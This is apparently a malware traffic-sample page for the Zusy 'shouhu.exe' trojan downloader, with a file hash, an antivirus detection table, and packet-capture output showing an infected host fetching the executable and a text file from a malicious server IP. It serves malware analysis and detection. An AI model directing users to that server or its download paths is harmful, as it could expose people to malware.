Zusy shouhu.exe Malware Trojan Downloader Dropper FULL PCAP FILE Download Traffic Sample

Download Attachments

  • 1 pcap shouhu
    Date added: November 3, 2016 1:07 am
    Added by: admin
    File size: 54 KB
    Downloads: 105
SHA256: 439f3181ca4d64c15041b0e011e5b1769f79e414b9ad78e26c42b39c2253b005
File name: shouhu.exe
Detection ratio: 31 / 56
Analysis date: 2016-11-03 00:43:25 UTC
Engine                   Result                                        Update
AegisLab                 Troj.W32.Sasfis.lqzi                          20161102
AhnLab-V3                Malware/Win32.Generic.N2142312657             20161102
Antiy-AVL                Trojan/Win32.TSGeneric                        20161103
Arcabit                  Trojan.Zusy.D313F0                            20161103
Avast                    Win32:Malware-gen                             20161103
Baidu                    Win32.Trojan.WisdomEyes.16070401.9500.9557    20161101
BitDefender              Gen:Variant.Zusy.201712                       20161103
Bkav                     W32.Clod32a.Trojan.2bca                       20161102
Comodo                   Worm.Win32.Dropper.RA                         20161102
CrowdStrike Falcon (ML)  malicious_confidence_100% (W)                 20161024
Cyren                    W32/Agent.EW.gen!Eldorado                     20161102
Emsisoft                 Gen:Variant.Zusy.201712 (B)                   20161102
F-Prot                   W32/Agent.EW.gen!Eldorado                     20161102
F-Secure                 Trojan:W32/DelfInject.R                       20161102
Fortinet                 Riskware/Qhost                                20161102
GData                    Gen:Variant.Zusy.201712                       20161102
Invincea                 trojan.win32.startpage.agm                    20161018

2016-11-02 19:27:46.918199 IP 192.168.1.102.53070 > 42.51.155.153.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /yehuo/shouhu.exe?id=0.671988278308449 HTTP/1.1
E..a.6@...T....f*3...N.P.a.j..b.P.......GET /yehuo/shouhu.exe?id=0.671988278308449 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 42.51.155.153
Connection: Keep-Alive

2016-11-02 19:27:47.170302 IP 192.168.1.102.53070 > 42.51.155.153.80: Flags [.], ack 2921, win 256, length 0
E..(.7@...U....f*3...N.P.a....n/P...@p........

E..(.m@...T....f*3...O.P...1....P...J.........
2016-11-02 19:28:21.110880 IP 192.168.1.102.53071 > 42.51.155.153.80: Flags [P.], seq 0:434, ack 1, win 256, length 434: HTTP: GET /yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.744495382322232 HTTP/1.1
E....n@...R....f*3...O.P...1....P.......GET /yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.744495382322232 HTTP/1.1
Accept: */*
Referer: http://42.51.155.153/yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.744495382322232
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 42.51.155.153
Cache-Control: no-cache

2016-11-02 19:28:21.419292 IP 192.168.1.102.53071 > 42.51.155.153.80: Flags [.], ack 406, win 255, length 0

E..(.p@...T....f*3...N.P.a......P..,.P........
2016-11-02 19:28:26.762109 IP 192.168.1.102.53071 > 42.51.155.153.80: Flags [P.], seq 434:868, ack 406, win 255, length 434: HTTP: GET /yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.498024452336662 HTTP/1.1
E....q@...R....f*3...O.P.......bP.......GET /yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.498024452336662 HTTP/1.1
Accept: */*
Referer: http://42.51.155.153/yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.498024452336662
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 42.51.155.153
Cache-Control: no-cache

2016-11-02 19:28:26.886586 IP 192.168.1.102.53071 > 42.51.155.153.80: Flags [.], ack 407, win 255, length 0

E..(.u@...T....f*3...P.P.Z.I....P.............
2016-11-02 19:28:27.159415 IP 192.168.1.102.53072 > 42.51.155.153.80: Flags [P.], seq 0:434, ack 1, win 256, length 434: HTTP: GET /yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.498024452336662 HTTP/1.1
E....v@...R....f*3...P.P.Z.I....P...`)..GET /yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.498024452336662 HTTP/1.1
Accept: */*
Referer: http://42.51.155.153/yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.498024452336662
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 42.51.155.153